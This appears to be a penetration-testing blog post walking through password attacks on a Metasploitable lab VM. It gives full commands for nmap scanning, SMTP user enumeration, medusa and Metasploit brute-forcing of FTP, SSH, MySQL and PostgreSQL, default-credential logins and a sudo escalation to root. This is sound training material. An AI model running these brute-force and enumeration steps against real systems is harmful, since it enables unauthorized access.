Among the skills that a penetration tester must have there is the ability to attack passwords and crack hashes. In this episode of #HackOnTuesday, we go through some tools and techniques to attack weak passwords for the most common services such as FTP, Telnet and SSH, just to name a few. After having cracked several passwords, Gianni moves on and uses a common sudo misconfiguration to get root access on the Metasploitable VM.

Tools, Scripts, and Exploits

The tools,scripts, and exploits used in this episode of #HackOnTuesday are:

Steps

  • Identify the services listening on the target
    • nmap -v -sV 192.168.75.149 -p-
  • Test if VRFY, RCPT, or EXPN are enabled.
    • nc 192.168.75.149 25
    • RCPT TO:mike   # This returns an “Error: need MAIL command” message.
    • EXPN mike   # This returns an “Error: command not recognized” message.
    • VRFY mike # This returns a “Recipient address rejected” message.
    • VRFY root   # This works fine!
  • Enumerate the local users via SMTP
    • With Nmap:
      • nmap –script smtp-enum-users.nse 192.168.75.149   # In this case, we get a “Method RCPT returned a unhandled status code.” message. As seen before, the RCPT method returns an error.
    • With Metasploit:
      • msfconsole
      • use auxiliary/scanner/smtp/smtp_enum
      • show options
      • set RHOSTS 192.168.75.149
      • set USER_FILE /home/kusanagi/metasploitable/wordlists/usernames.txt
      • set THREADS 20
      • run
  • Attack the FTP service (port 21)
    • medusa -h 192.168.75.149 -U ftp_usernames.txt -P ftp_passwords.txt -e ns -M ftp -v 6 -t 10 -O ftp.log
    • ftp 192.168.75.149   # Username: msfadmin , Password: msfadmin
    • cd vulnerable
    • ls
    • exit
    • ftp 192.168.75.149   # Username: user, Password: user
    • ls
    • exit
  • Attack the SSH service (port 22)
    • medusa -h 192.168.75.149 -U ssh_usernames.txt -P ssh_passwords.txt -e ns -M ssh -t 10 -O ssh.log
  • Attack the Telnet service  (port 23)
    • telnet 192.168.75.149
    • msfadmin/msfadmin   # or user/user
    • uname -a
  • Attack the MySQL service  (port 3306)
    • msfconsole
    • search mysql
    • use auxiliary/scanner/mysql/mysql_login
    • show options
    • set RHOSTS 192.168.75.149
    • set USER_FILE /home/kusanagi/metasploitable/wordlists/mysql_usernames.txt
    • set PASS_FILE /home/kusanagi/metasploitable/wordlists/mysql_passwords.txt
    • set VERBOSE false   # If true, it may take twice as much time to find the password for long wordlists.
    • run
    • mysql -h 192.168.75.149 -u root -p   # Password: root
  • Attack the PostgreSQL service  (port 5432)
    • msfconsole
    • search postgres
    • use auxiliary/scanner/postgres/postgres_login
    • show options
    • set RHOSTS 192.168.75.149
    • run
    • Open a new terminal and connect to the PostgreSQL Server
      • psql -h 192.168.75.149 -d template1 -U postgres -W
      • SELECT version();
      • \q
  • Escalate the privileges
    • ssh user@192.168.75.149
    • sudo -i   # This returns the “user is not in the sudoers file.” message.
    • exit
    • ssh msfadmin@192.168.75.149
    • sudo -i
    • whoami
  • Game over!

Leave a Reply

Your email address will not be published. Required fields are marked *